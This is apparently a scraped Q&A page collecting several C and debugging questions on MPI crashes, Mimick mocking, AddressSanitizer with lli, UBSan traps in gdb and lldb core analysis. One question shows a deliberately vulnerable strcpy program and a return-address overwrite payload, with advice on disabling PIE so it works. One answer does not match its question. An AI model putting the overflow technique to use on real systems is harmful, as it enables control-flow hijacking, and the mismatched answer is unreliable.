Segmentation fault while using MPI_Barrier in `libpmpi.12.dylib` - c

I install mpich using brew install mpich, but if I use MPI_Barrier, I will get segmentation fault. See the simple code below:
// A.c
#include "mpi.h"
#include <stdio.h>
int main(int argc, char *argv[])
{
int rank, nprocs;
MPI_Init(&argc,&argv);
MPI_Comm_size(MPI_COMM_WORLD,&nprocs);
MPI_Comm_rank(MPI_COMM_WORLD,&rank);
MPI_Barrier(MPI_COMM_WORLD);
printf("Hello, world. I am %d of %d\n", rank, nprocs);fflush(stdout);
MPI_Finalize();
return 0;
}
mpicc A.c -g -O0 -o A
After running mpirun -n 2 ./A, I got error below:
================================================================================== =
= BAD TERMINATION OF ONE OF YOUR APPLICATION PROCESSES
= PID 60914 RUNNING AT pivotal.lan
= EXIT CODE: 139
= CLEANING UP REMAINING PROCESSES
= YOU CAN IGNORE THE BELOW CLEANUP MESSAGES
===================================================================================
YOUR APPLICATION TERMINATED WITH THE EXIT STRING: Segmentation fault: 11 (signal 11)
This typically refers to a problem with your application.
Please see the FAQ page for debugging suggestions
The detailed stack from lldb -c /cores/core.60914:
(lldb) target create --core "core.60914"
warning: (x86_64) /cores/core.60914 load command 82 LC_SEGMENT_64 has a fileoff + filesize (0x27d3b000) that extends beyond the end of the file (0x27d3a000), the segment will be truncated to match
warning: (x86_64) /cores/core.60914 load command 83 LC_SEGMENT_64 has a fileoff (0x27d3b000) that extends beyond the end of the file (0x27d3a000), ignoring this section
bCore file '/cores/core.60914' (x86_64) was loaded.
(lldb) bt
* thread #1: tid = 0x0000, 0x000000010176f432 libpmpi.12.dylib`MPID_Request_create + 244, stop reason = signal SIGSTOP
* frame #0: 0x000000010176f432 libpmpi.12.dylib`MPID_Request_create + 244
frame #1: 0x000000010178d2fa libpmpi.12.dylib`MPID_Isend + 152
frame #2: 0x0000000101744d6f libpmpi.12.dylib`MPIC_Sendrecv + 351
frame #3: 0x00000001016861df libpmpi.12.dylib`MPIR_Barrier_intra + 401
frame #4: 0x00000001016866f2 libpmpi.12.dylib`MPIR_Barrier + 67
frame #5: 0x0000000101686789 libpmpi.12.dylib`MPIR_Barrier_impl + 90
frame #6: 0x00000001016860fb libpmpi.12.dylib`MPIR_Barrier_intra + 173
frame #7: 0x00000001016866f2 libpmpi.12.dylib`MPIR_Barrier + 67
frame #8: 0x0000000101686789 libpmpi.12.dylib`MPIR_Barrier_impl + 90
frame #9: 0x00000001015a8ed9 libmpi.12.dylib`MPI_Barrier + 820
frame #10: 0x0000000101590ed8 a.out`main(argc=1, argv=0x00007fff5e66fa40) + 88 at b.c:11
frame #11: 0x00007fff8f7805ad libdyld.dylib`start + 1
The usage is copied from official guide. What's the problem of MPI_Barrier function implementation in libmpi.12.dylib? Thanks.

Related

stack not 16 byte aligned error when mocking exit with mimick

I'm using Mimick to mock the exit function, but I get a stack not 16 byte aligned error.
Here's a reduced code example:
#include <stdlib.h>
#include <mimick.h>
mmk_mock_define(exit_mock, void, int);
int main(void) {
mmk_mock("exit#self", exit_mock);
exit(EXIT_FAILURE);
mmk_reset(exit);
return 0;
}
Compiled with the following on macOS 11:
clang -I ./include -g -rpath ./lib/ -Wl,-segalign,1000 -L ./lib/ -l mimick -o test test.c
Where mimick is already compiled and installed to ./lib and ./include.
Running with: lldb ./test
lldb gives me:
(lldb) target create "test"
Current executable set to '/Users/camdennarzt/Developer/C/test/test' (x86_64).
(lldb) r
Process 94625 launched: '/Users/camdennarzt/Developer/C/test/test' (x86_64)
Process 94625 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
frame #0: 0x00007fff20531c9e libdyld.dylib`stack_not_16_byte_aligned_error
libdyld.dylib`stack_not_16_byte_aligned_error:
-> 0x7fff20531c9e <+0>: movdqa %xmm0, (%rsp)
0x7fff20531ca3 <+5>: int3
0x7fff20531ca4 <+6>: nop
0x7fff20531ca5 <+7>: nop
Target 0: (test) stopped.
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
* frame #0: 0x00007fff20531c9e libdyld.dylib`stack_not_16_byte_aligned_error
frame #1: 0x00007ffeefbfefc8
frame #2: 0x0000000100001941 test`mmk_mock_create_internal + 289
frame #3: 0x0000000100003315 test`mmkuser_exit_mock_create(tgt="\x80&", opts=(sentinel_ = 0, noabort = 0)) at test.c:4:1
frame #4: 0x00000001001ae010
frame #5: 0x00007fff20532f3d libdyld.dylib`start + 1
frame #6: 0x00007fff20532f3d libdyld.dylib`start + 1
Because I saw this I also tried compiling with -fno-stack-check -mmacosx-version-min=10.14 but it didn't help. I also tried with a homebrew installed clang but that didn't help either.
What am I doing wrong here? Or is there a bug in a library/compiler I'm using?
I do not know Criterion/Mimick so this may/may not make a difference.
If params[i].argv is to mimic main()'s argv, then .argv[argc] as NULL is missing.
argv[argc] shall be a null pointer.
C17 Spec.
params[0].argc = 1;
params[0].argv = cr_malloc(sizeof(char*) * 2 /* not 1 */);
params[0].argv[0] = cr_strdup("progname");
params[0].argv[1] = NULL; /* add */
Likewise for other params[i] and free_parse_args() needs update.

How can use I Address Sanitizer in lli (LLVM)

I would like to run a bitcode with address sanitizer argument, but I have a problem with that, if I run it, the segmentation fault will happen.
$cat sample.c
#include <stdlib.h>
void *p;
int main() {
p = malloc(7);
return 0;
}
$clang -emit-llvm -fsanitize=address -c -g sample.c
$lli sample.bc
Stack dump:
0. Program arguments: lli sample.bc
0 lli 0x000000010c112d9c llvm::sys::PrintStackTrace(llvm::raw_ostream&) + 37
1 lli 0x000000010c11319e SignalHandler(int) + 192
2 libsystem_platform.dylib 0x00007fff603e2b3d _sigtramp + 29
3 libsystem_platform.dylib 000000000000000000 _sigtramp + 2680280288
4 lli 0x000000010be3ff74 llvm::ExecutionEngine::runStaticConstructorsDestructors(llvm::Module&, bool) + 310
5 lli 0x000000010beac842 llvm::MCJIT::runStaticConstructorsDestructors(bool) + 388
6 lli 0x000000010bb715c6 main + 8866
7 libdyld.dylib 0x00007fff601f7ed9 start + 1
Segmentation fault: 11
Sanitized code requires special runtime support which is implemented in Asan runtime library. lli does not load this library by default (because users normally don't need it) so you need to request it explicitly via LD_PRELOAD=libasan.so.VER. Note libasan.so is GCC convention, for Clang you may need something like libclang_rt.asan.XXX. You can determine full library paths via
GCC_ASAN_PRELOAD=$(gcc -print-file-name=libasan.so)
CLANG_ASAN_PRELOAD=$(clang -print-file-name=libclang_rt.asan-x86_64.so)

can't overwirte return address outside of gdb

I try to use a buffer overflow on the stack to
redirect the return address. My goal is to overwrite the return address within the "check_auth" function, that the main continues at line 22 ("printf("GRANTED\n");"). Here is the C code:
fugi#calc:~/Desktop$ gcc -g auth_overflow.c -o auth_overflow
fugi#calc:~/Desktop$ gdb auth_overflow -q
Reading symbols from auth_overflow...done.
(gdb) list 1
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <string.h>
4
5 int check_auth(char *pass){
6 char pass_buff[16];
7 int auth_flag = 0;
8 strcpy(pass_buff, pass);
9
10 if(strcmp(pass_buff, "yes") == 0)
(gdb)
11 auth_flag = 1;
12 return auth_flag;
13 }
14
15 int main( int argc, char *argv[]){
16 if(argc < 2){
17 printf("Usage: %s <password>\n\n", argv[0]);
18 exit(0);
19 }
20 if(check_auth(argv[1])){
(gdb)
21 printf("ACCESS\n");
22 printf("GRANTED\n");
23 }
24 else{
25 printf("\n Access Denied\n");
26 }
27 return 0;
28 }
I am using gdb on a 64bit Debian system, to debug the code.
My problem is, the overwriting doesn't work outside of gdb.
I know, that the return address in which points back to main and the the beginning of the input variable(pass_buff) are 40 bytes appart.
(gdb) i f
Stack level 0, frame at 0x7fffffffe170:
rip = 0x55555555477d in check_auth (auth_overflow.c:8); saved rip = 0x555555554800
called by frame at 0x7fffffffe190
source language c.
Arglist at 0x7fffffffe160, args: pass=0x7fffffffe562 'A' <repeats 56 times>
Locals at 0x7fffffffe160, Previous frame's sp is 0x7fffffffe170
Saved registers:
rbp at 0x7fffffffe160, rip at 0x7fffffffe168
(gdb) x/x *0x7fffffffe168
0x55554800: Cannot access memory at address 0x55554800
(gdb) x/x pass_buff
0x7fffffffe140: 0x00000001
(gdb) p 0x7fffffffe168 - 0x7fffffffe140
$1 = 40
So, when I do this:
(gdb) run `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55")'`
Starting program: /home/fugi/Desktop/auth_overflow `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55")'`
GRANTED
Program received signal SIGBUS, Bus error.
main (argc=<error reading variable: Cannot access memory at address 0x414141414141413d>,
argv=<error reading variable: Cannot access memory at address 0x4141414141414131>) at auth_overflow.c:28
28 }
But when I do it without gdb it doesn't work:
fugi#calc:~/Desktop$ ./auth_overflow `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55")'`
Segmentation fault
What can I do to make this work?
I also tried to do this by repeating the address, but the problem here is, that I can't print null bytes:
(gdb) x/12xg $rsp
0x7fffffffe130: 0x00007fffffffe156 0x00007fffffffe56c
0x7fffffffe140: 0x4141414141414141 0x4141414141414141
0x7fffffffe150: 0x4141414141414141 0x4141414141414141
0x7fffffffe160: 0x4141414141414141 **0x0000555555554810**
0x7fffffffe170: 0x00007fffffffe268 0x0000000200000000
0x7fffffffe180: 0x0000555555554840 0x00007ffff7a57561
to make the address fit I need to add \x00\x00 but then I get:
fugi#calc:~/Desktop$ ./auth_overflow `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55\x00\x00")'`
**bash: warning: command substitution: ignored null byte in input**
Segmentation fault
Is there a way to repeat the address like this?
Thanks for you help in advance
I don't know about exact build settings in your development environment, but I can guess some problems.
on current Linux environment, PIE (Position-Independent-Executive) is enabled. which means, your target address is not always 0x0000555555554810. to check that, add this code to main function :
printf("CODE: %p\n", (void*)main);
if this code generates same address every times, then PIE is disabled.
argv argument cannot include NULL byte (except end of string). but this is not a critical problem because on x86-64 system they uses only 6 low bytes for virtual address.
to disable PIE build : use -no-pie. gcc main.c -o main -no-pie
If you're asking how to return check_auth(), I'd do this:
int main( int argc, char *argv[]){
if(argc < 2){
printf("Usage: %s <password>\n\n", argv[0]);
exit(0);
}
int flag = check_auth(argv[1]);
if(flag){
printf("ACCESS\n");
printf("GRANTED\n");
}else{
printf("\n Access Denied\n");
}
return flag;
}
My main language is Java, actually, so if I'm wrong, please correct me. I'm trying to learn C as we speak.

How can I break on multiple clang/ubsan warnings in gdb?

Take the following test program (compiled with clang 3.4 and run under gdb 7.6.1):
#include <limits.h>
#include <stdio.h>
int main(void)
{
int a = INT_MAX + 1;
int b = INT_MAX + 2;
printf("Result: a = %d, b = %d\n", a, b);
}
I would like to be able to use gdb to automatically stop at the second occurrence of undefined behaviour here (int b = ...).
If I compile with:
clang -fsanitize=undefined -O0 -ggdb3 -o test test.c
...then running the program under gdb just results in it running to completion:
test.c:6:21: runtime error: signed integer overflow: 2147483647 + 1 cannot be represented in type 'int'
test.c:7:21: runtime error: signed integer overflow: 2147483647 + 2 cannot be represented in type 'int'
Result: a = -2147483648, b = -2147483647
[Inferior 1 (process 24185) exited normally]
But if I use:
clang -fsanitize=undefined-trap -fsanitize-undefined-trap-on-error -O0 -ggdb3 -o test test.c
...then I can't continue past the first occurrence:
Program received signal SIGILL, Illegal instruction.
0x0000000000400556 in main () at test.c:6
6 int a = INT_MAX + 1;
(gdb) c
Continuing.
Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.
Is it possible to get gdb to break when (and only when) undefined behaviour is flagged, but to let the program continue otherwise? I'm after a technique that will work not just on this example, but in general, where the offending line might be inside a loop, the values may be determined at runtime, etc.
On x86-64 the instruction that causes SIGILL and stops a program is ud2 (http://asm.inightmare.org/opcodelst/index.php?op=UD2). In order to archive your goal you can change in gdb handling of SIGILL and use jumping (you need to add 2 to $pc on x86_64):
This is how the instruction ud2 is placed in the code of your test program on x86_64:
0x00000000004004f0 <+32>: 0f 85 02 00 00 00 jne 0x4004f8 <main+40>
=> 0x00000000004004f6 <+38>: 0f 0b ud2
0x00000000004004f8 <+40>: b8 ff ff ff 7f mov $0x7fffffff,%eax
These are gdb commands that is necessary to use:
handle SIGILL stop print nopass
set $pc = $pc + 2
This is an example for your test program:
$ gdb -q ./test
Reading symbols from /home/test...done.
(gdb) handle SIGILL stop print nopass
Signal Stop Print Pass to program Description
SIGILL Yes Yes No Illegal instruction
(gdb) r
Starting program: /home/test
Program received signal SIGILL, Illegal instruction.
0x00000000004004f6 in main () at test.c:6
6 int a = INT_MAX + 1;
(gdb) set $pc = $pc + 2
(gdb) c
Continuing.
Program received signal SIGILL, Illegal instruction.
0x000000000040051f in main () at test.c:7
7 int b = INT_MAX + 2;
(gdb) set $pc = $pc + 2
(gdb) c
Continuing.
Result: a = -2147483648, b = -2147483647
[Inferior 1 (process 7898) exited normally]
(gdb)
Useful links:
http://sourceware.org/gdb/current/onlinedocs/gdb/Jumping.html#Jumping
http://sourceware.org/gdb/current/onlinedocs/gdb/Signals.html#Signals

analyzing .DSYM file using lldb

I wrote a simple c program that makes use of the assert() call. I'd like to analyze it using lldb.
OS in use: OS X Mavericks
Compiler used to compile:
Apple LLVM version 5.0 (clang-500.2.79) (based on LLVM 3.3svn)
Target: x86_64-apple-darwin13.0.0
Thread model: posix
The -g compiler option generated a .DSYM directory. I wanted to know how to how to analyze this core using lldb.
PS: I have compiled using the -g option (clang -g test.c)
Start lldb and then execute the command
target create --core /cores/core.NNNN
where "/cores/core.NNNN" is your core file. A simple example:
$ lldb
(lldb) target create --core /cores/core.5884
Core file '/cores/core.5884' (x86_64) was loaded.
Process 0 stopped
* thread #1: tid = 0x0000, 0x00007fff8873c866 libsystem_kernel.dylib`__pthread_kill + 10, stop reason = signal SIGSTOP
frame #0: 0x00007fff8873c866 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8873c866: jae 0x7fff8873c870 ; __pthread_kill + 20
0x7fff8873c868: movq %rax, %rdi
0x7fff8873c86b: jmpq 0x7fff88739175 ; cerror_nocancel
0x7fff8873c870: ret
(lldb) bt
* thread #1: tid = 0x0000, 0x00007fff8873c866 libsystem_kernel.dylib`__pthread_kill + 10, stop reason = signal SIGSTOP
frame #0: 0x00007fff8873c866 libsystem_kernel.dylib`__pthread_kill + 10
frame #1: 0x00007fff85de835c libsystem_pthread.dylib`pthread_kill + 92
frame #2: 0x00007fff87554bba libsystem_c.dylib`abort + 125
frame #3: 0x00007fff8751ea5f libsystem_c.dylib`__assert_rtn + 321
frame #4: 0x000000010c867f59 a.out`main(argc=1, argv=0x00007fff53398c50) + 89 at prog.c:7
frame #5: 0x00007fff872b65fd libdyld.dylib`start + 1
(lldb) frame select 4
frame #4: 0x000000010c867f59 a.out`main(argc=1, argv=0x00007fff53398c50) + 89 at prog.c:7
4 int main(int argc, char **argv)
5 {
6 int i = 0;
-> 7 assert(i != 0);
8 return 0;
9 }
10
(lldb) p i
(int) $0 = 0
At the command prompt, in the same directory where you have the symbols directory, type
lldb program-name
then use the commands you want as in this official gdb to lldb command map:
lldb-gdb

Resources